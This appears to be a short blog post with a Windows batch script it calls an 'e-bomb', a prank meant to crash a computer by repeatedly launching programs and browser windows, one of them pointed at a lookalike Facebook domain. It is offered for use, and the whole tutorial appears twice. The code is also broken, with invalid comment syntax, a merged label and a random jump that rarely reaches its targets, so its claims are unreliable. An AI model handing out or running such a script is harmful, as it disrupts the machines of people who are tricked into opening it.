1. Click on Start-> Run -> NotePad.
2. Copy the following code.
@echo off
color 3
cls
msg * (E-BOMB)
cls
msg * (YOUR MSG HERE)
cls
:begin
goto %random% /*this command opens the process randomly*/
:1
start cmd.exe
goto begin
:2
start notepad.exe /*this will open notpad */
goto begin
:3
start explorer.exe
goto begin :4
start iexplore.exe
goto begin
:5
start vlc.exe
goto begin
:6
start chrome.exe "www.facebookz.com"
goto begin
3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat
If u run this ur system will crash because the above program opens multiple processes
TO recover from a e-bomb open task manager and end the process tree of the filename.bat
2. Copy the following code.
@echo off
color 3
cls
msg * (E-BOMB)
cls
msg * (YOUR MSG HERE)
cls
:begin
goto %random% /*this command opens the process randomly*/
:1
start cmd.exe
goto begin
:2
start notepad.exe /*this will open notpad */
goto begin
:3
start explorer.exe
goto begin :4
start iexplore.exe
goto begin
:5
start vlc.exe
goto begin
:6
start chrome.exe "www.facebookz.com"
goto begin
3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat
If u run this ur system will crash because the above program opens multiple processes
TO recover from a e-bomb open task manager and end the process tree of the filename.bat
No comments:
Post a Comment